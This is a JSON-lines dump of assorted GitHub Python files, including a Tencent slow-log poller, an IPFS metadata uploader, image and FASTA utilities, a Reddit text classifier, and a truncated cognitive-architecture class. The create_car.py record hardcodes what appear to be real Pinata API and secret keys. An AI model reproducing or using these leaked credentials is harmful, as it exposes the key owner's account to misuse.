0\n except TencentCloudSDKException as err: \n print(err)\nif __name__ == '__main__':\n SecretId = 'xxxxxx'\n SecretKey = 'xxxxxxx'\n now_time = int(time.time()) - 10\n stime = now_time - 10\n etime = now_time\n mysqlInstanceIds = get_mysql_instance(SecretId, SecretKey, tp=\"1\")\n mysqlInstanceIds.update(get_mysql_instance(SecretId, SecretKey, tp=\"\"))\n# print(mysqlInstanceIds)\n if mysqlInstanceIds:\n while True: \n #print(\"stime:\",stime,\"etime\",etime,\"notime:\", int(time.time()) - 10)\n process_sleep = 0\n for InstanceId,InstanceIdName in mysqlInstanceIds.items():\n #time.sleep(0.5) \n #get_mysql_slowlog(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep)\n process = Process(target=get_mysql_slowlog,args=(SecretId, SecretKey, InstanceId, InstanceIdName, stime, etime, process_sleep))\n process.start()\n process_sleep += 0.2\n now_time = int(time.time()) - 10\n ctime = now_time - etime\n stime = etime + 1\n if ctime > 1:\n etime = now_time\n else:\n etime = etime +9\n time.sleep(10)","repo_name":"Best1s/tencent_script","sub_path":"get_tencent_slowlog.py","file_name":"get_tencent_slowlog.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29605748350","text":"from web3 import Web3\nimport os\nimport json\nfrom pathlib import Path\nimport requests\n\ntemplate_json_file = 'scripts\\metadata\\CreateCar.json'\n\ndef gettemplate(template_json_file):\n with open(template_json_file,\"r\") as jt:\n json_template = json.load(jt)\n print('json template is done !')\n return json_template\n\ndef addinfo_data(_NIV,json_template):\n data = json_template\n #get N+IV from Contract\n NIV = _NIV\n Fabrication = 'renault'\n Modele = 'GTLine'\n Type_Carrosserie = 'Berlin'\n Annee_Production = '2015'\n Carburant = 'Gasoil'\n Transmition = 'Auto'\n Moteur = 'Hme9'\n\n data['NIV'] = NIV\n data['Fabrication']= Fabrication\n data['Modele']= Modele\n data['Type_Carrosserie']= Type_Carrosserie\n data['Annee_Production']= Annee_Production\n data['Carburant']= Carburant\n data['Transmition']= Transmition\n data['Moteur']= Moteur\n\n print('DATA is done !')\n\n return data\n\ndef upload_json_file(data):\n filename= data['NIV'] + \"_creation.json\"\n if not os.path.exists(filename):\n with open(filename, \"w\") as outfile:\n json.dump(data, outfile)\n print('json uploaded is done !') \n return filename\n\n################### PINATA ###################\ndef jsontoipfs(data):\n headers = {\n \"pinata_api_key\": '12f7dbee4220cf56156b',\n \"pinata_secret_api_key\": '54d808d09c01b67afd9661871cc64c186bbf7e12b3cd1fb92c10564456c9707f'\n }\n endpoint = \"https://api.pinata.cloud/pinning/pinJSONToIPFS\"\n payload = data \n response = requests.request(\"POST\", endpoint, headers=headers, data=payload)\n response_dict = json.loads(response.text)\n ##{'IpfsHash': 'QmQCsu8HtM569MmnjKM5SHUuhmkt3JibFEqjm9hJUZVpDD', 'PinSize': 188, 'Timestamp': '2023-03-18T11:16:12.012Z', 'isDuplicate': True} \n IpfsHash = response_dict['IpfsHash']\n print('Hash uploaded is done !') \n return IpfsHash\n\n# linktofile = 'https://gateway.pinata.cloud/ipfs/'+IpfsHash\n# print(linktofile)\n\n\ndef main():\n json_template = gettemplate(template_json_file)\n data = addinfo_data('11111',json_template)\n filename = upload_json_file(data)\n IpfsHash = jsontoipfs(data)\n print(f'Ipfshack is :{IpfsHash}')\n\n\nmain()","repo_name":"KhalilSayah/HACKATHON","sub_path":"scripts/metadata/create_car.py","file_name":"create_car.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25038187677","text":"\"\"\"\nModule with data processing utilities\n\"\"\"\n\nimport io\nimport tarfile\n\nimport cv2\nimport numpy as np\n\n\nclass ImageProcessor:\n \"\"\"\n Image processor with common preprocessing and postprocessing logic\n \"\"\"\n\n @staticmethod\n def normalize_image(image: np.ndarray) -> np.ndarray:\n \"\"\"\n Normalize image.\n Input image is assumed to be in <0, 255> range.\n Output image will be normalized to <-1, 1> range and use float32 dtype\n\n Args:\n image (np.ndarray): image to be normalized\n\n Returns:\n np.ndarray: normalized image\n \"\"\"\n\n image = image.astype(np.float32)\n image = image - 127.5\n image = image / 127.5\n return image\n\n @staticmethod\n def denormalize_image(image: np.ndarray) -> np.ndarray:\n \"\"\"\n Denormalize image.\n Input image is assumed to be in <-1, 1> range.\n Output image will be normalized and clipped to <0, 255> range and use uint8 dtype\n\n Args:\n image (np.ndarray): image to be normalized\n\n Returns:\n np.ndarray: denormalized image\n \"\"\"\n\n image = image + 1\n image = image * 127.5\n return np.clip(image.astype(np.uint8), 0, 255)\n\n @staticmethod\n def normalize_batch(batch: np.ndarray) -> np.ndarray:\n \"\"\"\n Normalize batch of images.\n Input images are assumed to be in <0, 255> range.\n Output images will be normalized to <-1, 1> range and use float32 dtype\n\n Args:\n batch (np.ndarray): batch of images to be normalized\n\n Returns:\n np.ndarray: batch of normalized images\n \"\"\"\n\n return np.array([ImageProcessor.normalize_image(image) for image in batch])\n\n @staticmethod\n def denormalize_batch(batch: np.ndarray) -> np.ndarray:\n \"\"\"\n Denormalize batch of images.\n Input images are assumed to be in <-1, 1> range.\n Output images will be normalized to <0, 255> range and use uint8 dtype\n\n Args:\n batch (np.ndarray): batch of images to be normalized\n\n Returns:\n np.ndarray: denormalized images\n \"\"\"\n\n return np.array([ImageProcessor.denormalize_image(image) for image in batch])\n\n\ndef get_image_tar_map(image: np.ndarray, name: str) -> dict:\n \"\"\"\n Get image tar map for given image and name\n\n Args:\n image (np.ndarray): image to compute tar file for\n name (str): name to be used in tar file\n\n Returns:\n dict: map with keys \"tar_info\" and \"bytes\"\n \"\"\"\n\n _, jpg_bytes = cv2.imencode(\".jpg\", image)\n\n # Create tar info for image\n tar_info = tarfile.TarInfo(name=name)\n tar_info.size = len(jpg_bytes)\n\n return {\n \"tar_info\": tar_info,\n \"bytes\": io.BytesIO(jpg_bytes)\n }\n","repo_name":"PuchatekwSzortach/pix2pix","sub_path":"net/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1272653602","text":"#Author: Eli Draizen\n#File: read_fasta\n#Date: 10/10/12\n\n#Standard libraries\nimport sys, re\nimport string\n\n#Custom libraries\nfrom Sequence import DNASequence \n\ndef read_fasta(inFile, alphabet=None):\n \"\"\"Read in fasta file and return sequence objects with the fasta data\n \n inFile - a file-like object contianing the fasta data\n \"\"\"\n #Set up sequence and flags for sequence and quality\n fastaSeq = None\n empty = True\n \n #Create alphabet for regex based on IUPAC amino acid and nucleic acids codes\n if alphabet:\n pattern = \"[{}]+\".format(re.escape(alphabet))\n alphabet = re.compile(pattern, re.IGNORECASE)\n else:\n alphabet = re.compile(r\"[A-Z]+\", re.IGNORECASE)\n delete = \"\"\n \n for i, line in enumerate(inFile):\n line = line.rstrip()\n if fastaSeq and line.startswith(\">\"):\n yield fastaSeq\n \n if line.startswith(\">\"):\n #Start new sequence and get id and comment\n fastaSeq = DNASequence()\n \n #Get name and desciption\n try:\n fastaSeq.name, fastaSeq.description = line[1:].split(None, 1)\n except:\n fastaSeq.name = line[1:]\n\n \n empty = False\n elif fastaSeq is None:\n #Invalid FASTA, terminate program\n print >> sys.stderr, \"Error: Fasta file must begin with '>' \\\non line '{}'\".format(line)\n sys.exit(1)\n else:\n #Append line to sequence\n for seq in alphabet.findall(line):\n fastaSeq.sequence += seq.upper()\n \n #Return last fasta entry if exists \n if fastaSeq:\n yield fastaSeq\n \n #Warn if empty or has errors\n if empty:\n print >> sys.stderr, \"WARNING: fastaFile has no sequences.\"\n","repo_name":"edraizen/hsp_tiler","sub_path":"hsp_tiler/read_fasta.py","file_name":"read_fasta.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35972913932","text":"# Makes a dictionary of sentences (keys) and IDs (values)\n# Given a text file, finds the ID of each sentence\n# Outputs a new CSV with the sentences and IDs in the order of the original text file\n\nimport csv\n\nids = {}\ncleaned = open(\"evanston5.csv\", \"w\")\n\n# This is the file that already contains sentence IDs\nmaster = open(\"/Users/laurapanfili/Desktop/fall-2016/NIH/Stimuli/csv/order1.csv\", \"r\")\nfor line in master:\n\tline = line.split(',')\n\t# Super hacky to get around sentences that have commas in them\n\tif len(line) > 4:\n\t\tline = [line[0], line[1], ','.join(line[2:-1]), line[-1]]\n\tsentID = line[0] + ',' + line[1]\n\tsent = line[2].strip(\"\\\"\")\n\tids[sent] = sentID\n\n# This is the file that's missing sentence IDs\nfix = open(\"/Users/laurapanfili/Desktop/fall-2016/NIH/Stimuli/northwestern/Evanston_order5.txt\", \"r\")\nfor line in fix:\n\tline = line.strip()\n\tif line != \"\" and line != \"PAUSE\":\n\t\tnewid = ids[line]\n\t\tnewLine = newid + \",\" + line\n\t\tcleaned.write(newLine)\n\t\tcleaned.write(\"\\n\")\n","repo_name":"lpanfili/IEEE","sub_path":"sentence-ids.py","file_name":"sentence-ids.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30946638089","text":"#!/usr/bin/env python3\n'''\ndef values_that_are_keys(my_dictionary):\n list=[]\n for value in my_dictionary.values():\n for key in my_dictionary.keys():\n if value==key:\n list.append(value)\n break\n \n return list\n\n\n\n\n# Uncomment these function calls to test your function:\nprint(values_that_are_keys({1:100, 2:1, 3:4, 4:10}))\n# should print [1, 4]\nprint(values_that_are_keys({\"a\":\"apple\", \"b\":\"a\", \"c\":100}))\n# should print [\"a\"]\n'''\n'''\nclass Node:\n def __init__(self, value, link_node=None):\n self.value = value\n self.link_node = link_node\n \n def set_link_node(self, link_node):\n self.link_node = link_node\n \n def get_link_node(self):\n return self.link_node\n \n def get_value(self):\n return self.value\n\n# Add your code below:\nyacko=Node(\"likes to yak\")\nwacko=Node(\"has a penchant for hoarding snacks\")\ndot=Node(\"enjoys spending time in movie lots\")\n\nyacko.set_link_node(dot)\ndot.set_link_node(wacko)\nprint(dot)\n'''\n\n# We'll be using our Node class\n'''\nclass Node:\n def __init__(self, value, next_node=None):\n self.value = value\n self.next_node = next_node\n \n def get_value(self):\n return self.value\n \n def get_next_node(self):\n return self.next_node\n \n def set_next_node(self, next_node):\n self.next_node = next_node\n\n# Create your LinkedList class below:\nclass LinkedList:\n def __init__(self,value=None):\n self.head_node=Node(value)\n def get_head_node(self):\n return self.head_node\n \n def insert_beginning(self,new_value):\n new_node=Node(new_value)\n new_node.set_next_node(self.head_node)\n self.head_node=new_node\n \n def stringify_list(self):\n string_list = \"\"\n current_node = self.get_head_node()\n while current_node:\n if current_node.get_value() != None:\n string_list += str(current_node.get_value()) + \"\\n\"\n current_node = current_node.get_next_node()\n return string_list\n \n def remove_node(self, value_to_remove):\n current_node = self.get_head_node()\n if current_node.get_value() == value_to_remove:\n self.head_node = current_node.get_next_node()\n else:\n while current_node:\n next_node = current_node.get_next_node()\n if next_node.get_value() == value_to_remove:\n current_node.set_next_node(next_node.get_next_node())\n current_node = None\n else:\n current_node = next_node\n\n\n\nll=LinkedList(5)\n#print(ll.get_head_node().get_value())\n#print(ll.get_head_node().get_next_node())\nll.insert_beginning(70)\nll.insert_beginning(5675)\nll.insert_beginning(90)\n\n#print(ll.stringify_list())\n\nll.remove_node(70)\nll.remove_node(5675)\nll.remove_node(5)\nll.remove_node(90)\nprint(ll.stringify_list())\n'''\n\n'''\notherset={1,4,7,7,3}\n#print(thisset)\n#print(otherset)\n\notherset2=set(range(1,10))\n#print(otherset2)\nA=[1,3,6,4,1,2,8,10]\nA=[1,2,3]\nm=max(A)\nprint(m)\n\nA=set(A)\nprint(A)\nB=set(range(1,m+1))\nprint(B)\nD=B-A\n\nif len(D)==0:\n print(m+1)\nelse:\n print(D)\n print(min(D))\n\n'''\n'''\ndef solution(A):\n #ab = set(range(1,abs(max(A))+2)).difference(set(A)) \n #return min(ab)\n\n print(set(range(1,abs(max(A))+2)))\n print(set(A))\n print(set(range(1,abs(max(A))+2)).difference(set(A)))\n\n\n\n\n\n\nsolution([1,3,6,4,1,2])\n\nsolution([-1,-3])\n\n'''\nstr=\"abba\"\nfor i in range(len(str) // 2):\n print(i)\n\n\n\n\n\n\n\n\n\n","repo_name":"luismendezescobar/myproy","sub_path":"python/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"72860358862","text":"import datetime\n\nfrom celery.task import task\n\nfrom smarthome_admin.models import SocketTimerSlot\n\n\n@task\ndef check_schedule():\n now = datetime.datetime.now()\n next = datetime.datetime.now() + datetime.timedelta(hours=1)\n args = {datetime.datetime.now().strftime(\"%A\").lower(): True}\n tasks = SocketTimerSlot.objects.filter(**args).filter(\n start_time__gt=datetime.time(hour=now.hour), start_time__lt=datetime.time(hour=next.hour))\n\n [t.countdown() for t in tasks]\n\n\n\n","repo_name":"dmarkey/smarthome_admin","sub_path":"smarthome_admin/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"69842486863","text":"\"\"\"Set of functions which help parse and clean data and load it into pandas dataframes\"\"\"\nimport pandas as pd\nimport re\nimport math\nimport nltk\n# pretrained tokenizer\nnltk.download('punkt')\nfrom nltk.tokenize import word_tokenize \n\n# import stemmer\nfrom nltk.stem import PorterStemmer \n\n# remove stopwords\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom types import SimpleNamespace\n\ndef read_csv(path = '/Users/sander/Desktop/ML_Learn/AI-Judge/aita_clean.csv', do_preprocess=True, samples=False):\n data = pd.read_csv(path) \n\n # remove unnecessary columns\n data.drop(['id', 'timestamp', 'edited', 'score', 'num_comments', 'verdict'], axis=1, inplace=True)\n\n # remove rows with incomplete data\n data = data.dropna()\n\n if samples:\n data = data.sample(n=samples)\n\n if do_preprocess:\n data = preprocess(data)\n\n return data\n\ndef preprocess(data):\n \"\"\"Perform various preprocessing operations on \n title and body of data\"\"\"\n # Select columns to apply preprocessing to\n pp_cols = [\"title\", \"body\"]\n\n # stemmer\n ps = PorterStemmer() \n\n # make all lowercase\n data[pp_cols] = data[pp_cols].applymap(lambda s:s.lower())\n\n # Remove all the special characters\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\W', ' ',s))\n\n # remove all single characters\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\s+[a-zA-Z]\\s+', ' ',s))\n\n # Remove single characters from the start (no space before them, but space after)\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'^[a-zA-Z]\\s+', ' ',s))\n\n # Removing prefixed 'b'\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'^b\\s+', ' ',s,flags=re.I))\n\n # remove all of: x200b (zero-width space)\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'x200b', ' ',s))\n\n # Substituting multiple spaces with single space\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\s+', ' ',s,flags=re.I))\n\n # Remove single numbers\n data[pp_cols] = data[pp_cols].applymap(lambda s:re.sub(r'\\d+', ' ',s,flags=re.I))\n\n # tokenize data\n data[pp_cols] = data[pp_cols].applymap(lambda s:word_tokenize(s))\n\n # perform stemming\n data[pp_cols] = data[pp_cols].applymap(lambda s: [ps.stem(word) for word in s])\n\n # remove stopwords\n data[pp_cols] = data[pp_cols].applymap(lambda s: [word for word in s if word not in stopwords.words('english')])\n \n return data\n\ndef freq_map(in_data, labels, laplacian=True):\n words = {}\n \n totalPos = 0\n totalNeg = 0\n \n data = pd.concat([in_data, labels], axis=1)\n # calculate frequencies\n for index, row in data.iterrows():\n\n words_in_body = len(row['body'])\n\n if row['is_asshole'] == 1:\n totalPos += words_in_body\n else:\n totalNeg += words_in_body\n \n # iterate through body text of this row\n for word in row['body']:\n if word not in words:\n words[word] = SimpleNamespace(pos_freq=0, neg_freq = 0)\n if row['is_asshole'] == 1:\n words[word].pos_freq += 1.0\n else:\n words[word].neg_freq += 1.0\n if laplacian:\n LaplacianSmoothFrequencies(words, totalPos, totalNeg)\n\n return words\n\ndef LaplacianSmoothFrequencies(dic, totalPos, totalNeg):\n for key in dic:\n freq_data = dic[key]\n\n freq_data.pos_freq += 1.0\n freq_data.pos_freq/= (totalPos + len(dic))\n\n freq_data.neg_freq += 1.0\n freq_data.neg_freq /= (totalNeg + len(dic))\n \ndef test_freqs(dataframe, dic, preprocess = False, prior_ratio = 1):\n if preprocess:\n preprocess(dataframe)\n pred_labels = []\n for index, row in dataframe.iterrows():\n bayes_result = 1\n for word in row['body']:\n if word in dic:\n bayes_result += math.log(dic[word].pos_freq / dic[word].neg_freq)\n\n bayes_result += math.log(prior_ratio)\n if bayes_result > 0:\n pred_labels.append(1)\n elif bayes_result < 0:\n pred_labels.append(0)\n else:\n pred_labels.append(-1)\n dataframe['pred_label'] = pred_labels\n\nif __name__ == '__main__':\n from data_processing import read_csv\n from data_processing import freq_map\n from data_processing import test_freqs\n from sklearn.model_selection import train_test_split\n\n data = read_csv(samples=5)\n\n X_train, X_test, y_train, y_test = train_test_split(data.drop(['is_asshole'], axis=1), data['is_asshole'], test_size=0.20, random_state=42)\n\n words = freq_map(X_train, y_train)\n\n test_freqs(data, words)\n","repo_name":"trigaten/AI-Judge","sub_path":"deprecated/FWindows/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"30180943041","text":"import math\nimport statistics\nfrom typing import Callable, Dict, List, Union\n\nfrom .classifier import Classifier\nfrom .errors import MissingStructureError\nfrom .float_between_one_and_zero import FloatBetweenOneAndZero\nfrom .focus import Focus\nfrom .hyper_parameters import HyperParameters\nfrom .id import ID\nfrom .location import Location\nfrom .logger import Logger\nfrom .random_machine import RandomMachine\nfrom .recycle_bin import RecycleBin\nfrom .structure import Structure\nfrom .structure_collections import StructureDict, StructureList, StructureSet\nfrom .structures import Frame, Space, View\nfrom .structures.links import Correspondence, Label, Relation\nfrom .structures.nodes import Chunk, Concept\nfrom .structures.nodes.chunks import LetterChunk\nfrom .structures.nodes.concepts import CompoundConcept\nfrom .structures.spaces import ConceptualSpace, ContextualSpace\nfrom .worldview import Worldview\n\n\nclass BubbleChamber:\n JUMP_THRESHOLD = HyperParameters.JUMP_THRESHOLD\n MAIN_INPUT_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_MAIN_INPUT_WEIGHT\n VIEWS_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_VIEW_QUALITIES_WEIGHT\n WORLDVIEW_WEIGHT = HyperParameters.BUBBLE_CHAMBER_SATISFACTION_WORLDVIEW_WEIGHT\n\n def __init__(self, focus, recycle_bin):\n self.loggers = {}\n self.random_machine = None\n self.worldview = None\n self.focus = focus\n self.recycle_bin = recycle_bin\n\n self.conceptual_spaces = None\n self.contextual_spaces = None\n self.frames = None\n self.frame_instances = None\n\n self.concepts = None\n self.chunks = None\n self.letter_chunks = None\n\n self.concept_links = None\n self.correspondences = None\n self.labels = None\n self.interspatial_labels = None\n self.relations = None\n self.interspatial_relations = None\n\n self.views = None\n\n self.satisfaction = 0\n self.general_satisfaction = 0\n self.result = None\n self.log_count = 0\n\n self.ACTIVATION_LOGGING_FREQUENCY = HyperParameters.ACTIVATION_LOGGING_FREQUENCY\n\n @classmethod\n def setup(cls, loggers: Dict[str, Logger], random_seed: int = None):\n bubble_chamber = cls(Focus(), RecycleBin())\n bubble_chamber.random_machine = RandomMachine(bubble_chamber, random_seed)\n bubble_chamber.reset(loggers)\n return bubble_chamber\n\n def reset(self, loggers: Dict[str, Logger]):\n self.loggers = loggers\n self.focus = Focus()\n self.worldview = Worldview(None)\n self.conceptual_spaces = self.new_set()\n self.contextual_spaces = self.new_set()\n self.frames = self.new_set()\n self.frame_instances = self.new_set()\n self.concepts = self.new_set()\n self.chunks = self.new_set()\n self.letter_chunks = self.new_set()\n self.concept_links = self.new_set()\n self.correspondences = self.new_set()\n self.labels = self.new_set()\n self.interspatial_labels = self.new_set()\n self.relations = self.new_set()\n self.interspatial_relations = self.new_set()\n self.views = self.new_set()\n self.satisfaction = 0\n self.general_satisfaction = 0\n self.result = None\n self.log_count = 0\n\n @property\n def spaces(self) -> StructureSet:\n return StructureSet.union(\n self.conceptual_spaces, self.contextual_spaces, self.frames\n )\n\n @property\n def input_spaces(self) -> StructureSet:\n return StructureSet.union(\n *[view.input_spaces for view in self.views],\n self.contextual_spaces.where(is_main_input=True),\n )\n\n @property\n def output_spaces(self) -> StructureSet:\n return self.new_set(*[view.output_space for view in self.views])\n\n @property\n def input_nodes(self) -> StructureSet:\n return StructureSet.union(\n *[space.contents.where(is_node=True) for space in self.input_spaces]\n )\n\n @property\n def size_of_raw_input(self) -> int:\n return sum(\n [\n len(space.contents.where(is_raw=True)) * len(space.conceptual_spaces)\n for space in self.contextual_spaces.where(is_main_input=True)\n ]\n )\n\n @property\n def structures(self) -> StructureSet:\n return StructureSet.union(\n self.conceptual_spaces,\n self.contextual_spaces,\n self.frames,\n self.chunks,\n self.concepts,\n self.correspondences,\n self.labels,\n self.letter_chunks,\n self.relations,\n self.views,\n self.concept_links,\n )\n\n @property\n def collections(self) -> dict:\n return {\n # views\n View: \"views\",\n # spaces\n ConceptualSpace: \"conceptual_spaces\",\n ContextualSpace: \"contextual_spaces\",\n Frame: \"frames\",\n # nodes\n Chunk: \"chunks\",\n Concept: \"concepts\",\n CompoundConcept: \"concepts\",\n LetterChunk: \"letter_chunks\",\n # links\n Correspondence: \"correspondences\",\n Label: \"labels\",\n Relation: \"relations\",\n }\n\n def recalculate_satisfaction(self):\n self.focus.recalculate_satisfaction()\n self.recalculate_general_satisfaction()\n if self.focus.view is not None:\n self.satisfaction = max(self.general_satisfaction, self.focus.satisfaction)\n else:\n self.satisfaction = self.general_satisfaction\n\n def recalculate_general_satisfaction(self):\n main_input_space = self.contextual_spaces.where(is_main_input=True).get()\n average_view_quality = (\n statistics.fmean([view.quality for view in self.views])\n if not self.views.is_empty\n else 0\n )\n self.general_satisfaction = sum(\n [\n self.MAIN_INPUT_WEIGHT * main_input_space.quality,\n self.VIEWS_WEIGHT * average_view_quality,\n self.WORLDVIEW_WEIGHT * self.worldview.satisfaction,\n ]\n )\n\n def update_activations(self) -> None:\n self.worldview.activate()\n for structure in self.structures:\n structure.recalculate_activation()\n for structure in self.structures:\n structure.update_activation()\n if (\n structure.activation > self.JUMP_THRESHOLD\n and self.random_machine.coin_flip()\n ):\n structure.activate()\n if self.log_count % self.ACTIVATION_LOGGING_FREQUENCY == 0:\n self.loggers[\"structure\"].log(structure)\n self.log_count += 1\n\n def new_dict(self, structures: dict = None, name: str = None) -> StructureDict:\n structures = {} if structures is None else structures\n return StructureDict(self, structures, name=name)\n\n def new_list(self, *structures: list, name: str = None) -> StructureList:\n return StructureList(self, structures, name=name)\n\n def new_set(self, *structures: list, name: str = None) -> StructureSet:\n return StructureSet(self, structures, name=name)\n\n def add(self, item):\n self.loggers[\"structure\"].log(item)\n for space in item.parent_spaces:\n space.add(item)\n self.loggers[\"structure\"].log(space)\n collection_name = self.collections[type(item)]\n getattr(self, collection_name).add(item)\n if item.is_interspatial and item.is_label:\n self.interspatial_labels.add(item)\n if item.is_interspatial and item.is_relation:\n self.interspatial_relations.add(item)\n\n def remove(self, item):\n if item.is_frame:\n self.frames.remove(item)\n if item.is_view:\n item_sub_views = item.sub_views.copy()\n for sub_view in item.sub_views:\n sub_view.super_views.remove(item)\n sub_view.cohesion_views.remove(item)\n for super_view in StructureSet.union(item.super_views, item.cohesion_views):\n for correspondence in super_view.members.copy():\n if (\n correspondence.start in item.parent_frame.input_space.contents\n or correspondence.start\n in item.parent_frame.output_space.contents\n ):\n self.remove(correspondence)\n if correspondence.parent_view in item_sub_views:\n super_view.remove(correspondence)\n super_view.sub_views.remove(item)\n for frame in item.frames:\n super_view.frames.remove(frame)\n correspondences = item.members.where(parent_view=item)\n for correspondence in correspondences:\n self.remove(correspondence)\n item.parent_frame.progenitor.instances.remove(item)\n item.parent_frame.parent_concept.instances.remove(item)\n self.remove(item.parent_frame)\n if item.is_correspondence:\n item.parent_view.remove(item)\n if item.is_link:\n if item.is_interspatial:\n self.interspatial_labels.remove(item)\n self.interspatial_relations.remove(item)\n item.parent_concept.instances.remove(item)\n for argument in item.arguments:\n argument.links_out.remove(item)\n argument.links_in.remove(item)\n argument.champion_labels.remove(item)\n argument.champion_relations.remove(item)\n argument.recalculate_exigency()\n if item.is_relation:\n if item.parent_concept is not None:\n item.parent_concept.instances.remove(item)\n if None not in {item.parent_concept, item.conceptual_space}:\n try:\n item.parent_concept.relations.where(\n parent_concept=item.conceptual_space.parent_concept\n ).get().end.instances.remove(item)\n except MissingStructureError:\n pass\n if item.is_chunk:\n for view in self.views.copy():\n if item in view.grouped_nodes:\n self.remove(view)\n for sub_chunk in item.sub_chunks:\n sub_chunk.super_chunks.remove(item)\n sub_chunk.recalculate_exigency()\n for super_chunk in item.super_chunks:\n super_chunk.sub_chunks.remove(item)\n for link in item.links:\n self.remove(link)\n for space in item.parent_spaces:\n space.contents.remove(item)\n if item.is_letter_chunk:\n if item.abstract_chunk is not None:\n item.abstract_chunk.instances.remove(item)\n collection_name = self.collections[type(item)]\n getattr(self, collection_name).remove(item)\n\n def new_conceptual_space(\n self,\n name: str,\n parent_concept: Concept,\n breadth: int = 1,\n no_of_dimensions: int = 0,\n parent_id: str = \"\",\n possible_instances: StructureSet = None,\n dimensions: List[ConceptualSpace] = None,\n sub_spaces: List[ConceptualSpace] = None,\n is_basic_level: bool = False,\n is_symbolic: bool = False,\n super_space_to_coordinate_function_map: Dict[str, Callable] = None,\n ) -> ConceptualSpace:\n possible_instances = (\n self.new_set() if possible_instances is None else possible_instances\n )\n dimensions = [] if dimensions is None else dimensions\n sub_spaces = [] if sub_spaces is None else sub_spaces\n space = ConceptualSpace(\n structure_id=ID.new(ConceptualSpace),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n contents=self.new_set(),\n breadth=breadth,\n no_of_dimensions=no_of_dimensions,\n dimensions=dimensions,\n sub_spaces=sub_spaces,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n possible_instances=possible_instances,\n is_basic_level=is_basic_level,\n is_symbolic=is_symbolic,\n super_space_to_coordinate_function_map=super_space_to_coordinate_function_map,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n self.add(space)\n return space\n\n def new_contextual_space(\n self,\n name: str,\n parent_concept: Concept,\n conceptual_spaces: StructureSet,\n parent_id: str = \"\",\n is_main_input: bool = False,\n ) -> ContextualSpace:\n space = ContextualSpace(\n structure_id=ID.new(ContextualSpace),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n contents=self.new_set(),\n conceptual_spaces=conceptual_spaces,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n is_main_input=is_main_input,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n self.add(space)\n return space\n\n # TODO: allow frames to be defined as children of other frames with only parts overwritten\n def new_frame(\n self,\n name: str,\n parent_concept: Concept,\n parent_frame: Frame,\n sub_frames: StructureSet,\n concepts: StructureSet,\n input_space: ContextualSpace,\n output_space: ContextualSpace,\n interspatial_links: StructureSet = None,\n parent_id: str = \"\",\n is_sub_frame: bool = False,\n depth: int = None,\n ) -> Frame:\n interspatial_links = (\n self.new_set() if interspatial_links is None else interspatial_links\n )\n frame = Frame(\n structure_id=ID.new(Frame),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n parent_frame=parent_frame,\n sub_frames=sub_frames,\n concepts=concepts,\n interspatial_links=interspatial_links,\n input_space=input_space,\n output_space=output_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n instances=self.new_set(),\n is_sub_frame=is_sub_frame,\n depth=depth,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if parent_frame is not None:\n parent_frame.instances.add(frame)\n self.add(frame)\n return frame\n\n def new_sub_frame(\n self,\n name: str,\n parent_concept: Concept,\n parent_frame: Frame,\n sub_frames: StructureSet,\n concepts: StructureSet,\n input_space: ContextualSpace,\n output_space: ContextualSpace,\n parent_id: str = \"\",\n ) -> Frame:\n return self.new_frame(\n name=name,\n parent_concept=parent_concept,\n parent_frame=parent_frame,\n sub_frames=sub_frames,\n concepts=concepts,\n input_space=input_space,\n output_space=output_space,\n parent_id=parent_id,\n is_sub_frame=True,\n )\n\n def new_chunk(\n self,\n locations: List[Location],\n parent_space: Space,\n members: StructureSet = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n activation: FloatBetweenOneAndZero = 0.0,\n abstract_chunk: Chunk = None,\n is_raw: bool = False,\n ) -> Chunk:\n if members is None:\n members = self.new_set()\n locations.append(Location([[len(members)]], self.conceptual_spaces[\"size\"]))\n parent_spaces = self.new_set(*[location.space for location in locations])\n chunk = Chunk(\n structure_id=ID.new(Chunk),\n parent_id=parent_id,\n locations=locations,\n members=members,\n parent_space=parent_space,\n quality=quality,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n super_chunks=self.new_set(),\n 